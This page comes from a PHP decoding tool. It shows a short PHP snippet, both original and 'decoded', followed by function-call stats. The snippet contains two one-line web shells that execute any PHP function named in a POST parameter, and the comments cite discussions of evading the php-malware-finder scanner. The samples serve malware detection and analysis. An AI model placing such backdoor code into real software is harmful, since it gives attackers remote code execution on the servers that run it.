Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comm..

Decoded Output download

<?php 

// https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687
print_r(call_user_func_array($_POST['functie'], array($_POST['argv'])));

// https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734
print_r($_POST['funct']($_POST['argv']));
 ?>

Did this file decode correctly?

Original Code

<?php 

// https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687
print_r(call_user_func_array($_POST['functie'], array($_POST['argv'])));

// https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734
print_r($_POST['funct']($_POST['argv']));

Function Calls

call_user_func_array 1

Variables

None

Stats

MD5 3a48f3e41a1f96de84602819b3b855d7
Eval Count 0
Decode Time 103 ms